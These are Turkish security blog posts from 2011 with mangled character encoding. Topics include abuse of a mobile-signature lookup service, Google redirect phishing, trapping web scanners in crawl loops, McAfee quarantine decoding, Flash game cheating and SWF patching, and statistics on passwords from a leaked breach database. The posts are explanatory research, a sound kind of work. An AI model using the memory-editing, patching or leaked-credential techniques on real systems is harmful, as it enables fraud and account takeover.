Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

